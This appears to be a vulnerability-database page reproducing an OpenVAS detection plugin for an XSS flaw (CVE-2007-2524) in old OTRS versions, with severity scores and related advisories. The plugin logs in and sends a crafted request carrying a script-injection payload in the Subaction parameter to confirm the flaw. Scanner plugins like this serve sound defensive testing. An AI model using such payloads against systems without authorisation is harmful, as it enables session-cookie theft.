Lucene search
Copyright (C) 2013 Greenbone AGOPENVAS:1361412562310803934HistorySep 25, 2013 - 12:00 a.m.
OTRS Subaction XSS Vulnerability
2013-09-2500:00:00
Copyright (C) 2013 Greenbone AG
plugins.openvas.org
11
5.5 Medium
AI Score
Confidence
High
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.017 Low
EPSS
Percentile
87.7%
OTRS (Open Ticket Request System) is prone to a cross-site scripting (XSS) vulnerability.
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:otrs:otrs";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803934");
script_version("2023-10-27T05:05:28+0000");
script_cve_id("CVE-2007-2524");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
script_tag(name:"creation_date", value:"2013-09-25 12:47:06 +0530 (Wed, 25 Sep 2013)");
script_name("OTRS Subaction XSS Vulnerability");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to steal the victim's
cookie-based authentication credentials.");
script_tag(name:"vuldetect", value:"Tries to login with provided credentials and sends a crafted HTTP
GET request to check if it is possible to conduct an XSS attack.");
script_tag(name:"insight", value:"An error exists in index.pl script which fails to validate user-supplied
input to Subaction parameter properly.");
script_tag(name:"solution", value:"Upgrade to OTRS (Open Ticket Request System) version 2.0.5 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"OTRS (Open Ticket Request System) is prone to a cross-site scripting (XSS) vulnerability.");
script_tag(name:"affected", value:"OTRS (Open Ticket Request System) version 2.0.1 to 2.0.4");
script_xref(name:"URL", value:"http://secunia.com/advisories/25205");
script_xref(name:"URL", value:"http://secunia.com/advisories/25419");
script_xref(name:"URL", value:"http://secunia.com/advisories/25787");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/23862");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/34164");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_analysis");
script_family("Web application abuses");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_dependencies("logins.nasl", "secpod_otrs_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("OTRS/installed", "http/login");
exit(0);
}
include("url_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
function get_otrs_login_cookie(location, otrsport, otrshost)
{
url = location + "/index.pl?";
username = urlencode(str:get_kb_item("http/login"));
password = urlencode(str:get_kb_item("http/password"));
payload = "Action=Login&RequestedURL=&Lang=en&TimeOffset=-330&User=" + username + "&Password=" + password;
req = string("POST ",url," HTTP/1.0\r\n",
"Host: ",otrshost," \r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Referer: http://",otrshost,location,"/index.pl\r\n",
"Connection: keep-alive\r\n",
"Content-Length: ", strlen(payload),"\r\n\r\n",
payload);
buf = http_keepalive_send_recv(port:otrsport, data:req);
if(!buf)
exit(0);
cookie = eregmatch(pattern:"Set-Cookie: Session=([a-z0-9]+)", string:buf);
if(!cookie[1])
exit(0);
return cookie[1];
}
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!loca = get_app_location(cpe:CPE, port:port))
exit(0);
if(loca == "/")
loca = "";
host = http_host_name(port:port);
cookie = get_otrs_login_cookie(location:loca, otrsport:port, otrshost:host);
if(cookie)
{
url = loca + '/index.pl?Action=AgentTicketMailbox&Subaction="<script>alert(document.cookie)</script>"';
req = string("GET ", url, " HTTP/1.1\r\n",
"Host: ", host, " \r\n",
"Connection: keep-alive\r\n",
"Cookie: Session=", cookie, "\r\n\r\n");
res = http_send_recv(port:port, data:req);
if(ereg(pattern:"^HTTP/1\.[01] 200", string:res) &&
"<script>alert(document.cookie)</script>" >< res && "Logout" >< res)
{
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
}
exit(0);
Related
nessus
nessus
openSUSE 10 Security Update : otrs (otrs-3544)
2007-10-17 00:00:00
Debian DSA-1298-1 : otrs2 - missing input sanitising
2007-06-01 00:00:00
openvas
openvas
Debian: Security Advisory (DSA-1298-1)
2008-01-17 00:00:00
Debian Security Advisory DSA 1299-1 (ipsec-tools)
2008-01-17 00:00:00
Debian Security Advisory DSA 1298-1 (otrs2)
2008-01-17 00:00:00
debian
debian
[SECURITY] [DSA 1299-1] New ipsec-tools packages fix denial of service
2007-06-07 17:52:59
[SECURITY] [DSA 1298-1] New otrs2 packages fix cross-site scripting
2007-05-28 11:24:44
osv
osv
otrs2
2007-05-28 00:00:00
securityvulns
securityvulns
prion
prion
Cross site scripting
2007-05-08 23:19:00
ubuntucve
ubuntucve
CVE-2007-2524
2007-05-08 00:00:00
debiancve
debiancve
CVE-2007-2524
2007-05-08 23:19:00
cve
cve
CVE-2007-2524
2007-05-08 23:19:00
5.5 Medium
AI Score
Confidence
High
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.017 Low
EPSS
Percentile
87.7%
Related for OPENVAS:1361412562310803934